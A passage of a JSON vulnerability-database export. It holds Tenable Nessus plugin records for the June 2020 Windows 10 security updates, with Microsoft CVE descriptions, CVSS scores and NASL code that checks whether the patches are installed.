vulnerability exists when the\n Windows Runtime improperly handles objects in memory. 
An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. 
The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. 
An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. 
An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. 
An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when the Microsoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the user's system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. 
An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\");\n # https://support.microsoft.com/en-us/help/4561621/windows-10-update-kb4561621\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?89a45c0c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561621.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561621'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561621])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T09:41:16", "description": "The remote Windows host is missing security update 4557957.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. 
An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1273, CVE-2020-1274, CVE-2020-1275,\n CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1120, CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. 
(CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Server Message Block 3.1.1\n (SMBv3) protocol handles certain requests. An attacker\n who successfully exploited the vulnerability could\n obtain information to further compromise the users\n system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. 
An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. 
An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. 
An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - An information disclosure vulnerability exists when a\n Windows service improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. 
The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. 
The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. 
An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. 
The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists in the way that\n the Microsoft Server Message Block 3.1.1 (SMBv3)\n protocol handles certain requests. An authenticated\n attacker who successfully exploited this vulnerability\n against an SMB Server could cause the affected system to\n crash. An unauthenticated attacker could also exploit\n this vulnerability against an SMB client and cause\n the affected system to crash. (CVE-2020-1284)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when the Microsoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. 
(CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)", "edition": 9, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-10T00:00:00", "title": "KB4557957: Windows 10 Version 2004 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1244", "CVE-2020-1253", "CVE-2020-1203", "CVE-2020-1277", "CVE-2020-1207", "CVE-2020-1275", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1273", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1284", "CVE-2020-1120", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1307", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1209", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1313", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1296", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1204", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1268", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1206", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", 
"CVE-2020-1248", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "modified": "2020-06-10T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4557957.NASL", "href": "https://www.tenable.com/plugins/nessus/137304", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137304);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/13\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1120\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1199\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1204\",\n \"CVE-2020-1206\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1209\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n 